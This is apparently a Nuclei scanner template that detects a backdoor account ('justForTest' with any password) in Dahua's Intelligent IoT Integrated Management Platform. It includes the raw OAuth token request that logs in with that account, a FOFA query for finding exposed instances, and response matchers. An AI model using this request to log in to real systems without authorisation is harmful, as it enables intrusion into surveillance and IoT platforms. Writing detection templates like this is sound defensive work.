39 lines
1.3 KiB
YAML
39 lines
1.3 KiB
YAML
id: dahua-icc-backdoor-user
|
|
|
|
info:
|
|
name: Dahua Intelligent IoT - Information Disclosure
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
There is a vulnerability in the user login interface /evo-apigw/evo-oauth/oauth/token of Zhejiang Dahua Technology Co., Ltd. Intelligent IoT Integrated Management Platform. Users can successfully log in to the platform using justForTest/any password, causing information leakage.
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: icon_hash="-1935899595"body="*客户端会小于800*"
|
|
tags: dahua,exposure,backdoor,bypass
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"success":'
|
|
- '"access_token":'
|
|
- '"token_type":'
|
|
- 'magicId'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
# digest: 4a0a0047304502202f66ac6a8c54de587e6e21482a082175a7931ae59dfa8ac2e63bf405ddcfe870022100a19620245a5e1eb6c6390359e3735bfff8a966f72dd07da246133ccf02ce03e5:922c64590222798bb761d5b6d8e72950 |